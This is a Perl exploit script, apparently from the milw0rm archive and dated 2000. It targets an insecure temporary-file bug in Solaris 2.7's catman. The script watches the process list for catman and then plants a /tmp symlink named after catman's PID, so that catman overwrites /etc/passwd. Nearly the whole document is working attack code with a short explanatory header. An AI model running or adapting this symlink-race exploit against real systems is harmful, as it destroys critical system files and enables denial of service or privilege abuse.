#!/usr/local/bin/perl -w
#
# The problem is catman creates files in /tmp
# insecurly. They are based on the PID of the
# catman process, catman will happily clobber
# any files that are symlinked to that file.
# The idea of this script is to watch the
# process list for the catman process, get
# the pid and Create a symlink in /tmp to our
# file to be clobbered. This exploit depends
# on system speed and process load. This
# worked on a patched Solaris 2.7 box (August
# 2000 patch cluster)
# SunOS rootabega 5.7 Generic_106541-12 sun4u
# sparc SUNW,Ultra-1 lwc@vapid.betteros.org
# 11/21/2000 Vapid Labs.
# http://vapid.betteros.org
$clobber = "/etc/passwd";
while(1) {
open ps,"ps -ef | grep -v grep |grep -v PID |";
while(<ps>) {
@args = split " ", $_;
if (/catman/) {
print "Symlinking sman_$args[1] to $clobber\n";
symlink($clobber,"/tmp/sman_$args[1]");
exit(1);
}
}
}
# milw0rm.com [2000-12-20]